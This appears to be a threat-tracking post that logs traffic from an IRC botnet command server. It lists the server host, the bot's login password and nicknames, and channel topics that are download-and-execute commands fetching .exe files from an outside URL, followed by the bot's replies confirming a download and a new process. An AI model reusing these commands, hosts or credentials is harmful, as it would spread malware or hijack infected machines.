p2c.travestin.net(hbot hosted in United States New York Hostforweb Inc)

Host Name: p2c.travestin.net

Resolved : [p2c.travestin.net] To []

Transport Protocol: TCP
Remote Address:
Remote Port: 6667
Protocol: IRC

IRC Data
User Name: demkldz
Host Name: *
Server Name:
Real Name: HOME-OFF-D5F0AC
Password: Akuma
Nick Name: USA|XP|HOME-OFF-D5F0AC|633462
Non RFC Conform: 1
Name: #grfg
Name: #test
Topic Deleted: :!p2p
Notice Message Deleted
Value: :Akuma.Siker NOTICE AUTH :*** eh…

Now talking in #debug#
Topic On: [ #debug# ] [ #neodownload http://www.escortbensu.com/x.exe c:x.exe 1 ]
Topic By: [ Akuma ]

Nick: {XPAUT608990}
Username: pc7
Joined Channel: #sinsi2
Channel Topic for Channel #sinsi2: “.yo-dl http://www.escortbensu.com/h.exe c:windowssystem32ps.exe 1”
Channel Topic for Channel #debug#: “#neodownload http://www.escortbensu.com/x.exe c:x.exe 1”
Private Message to Channel #sinsi2: “.::[Download]::. Created process: “c:windowssystem32ps.exe”, PID: “
Private Message to Channel #sinsi2: “.::[Download]::. File download: 82.0KB to: c:windowssystem32ps.exe @ 41.0KB/sec.”

hosting infos:

Categories: Uncategorized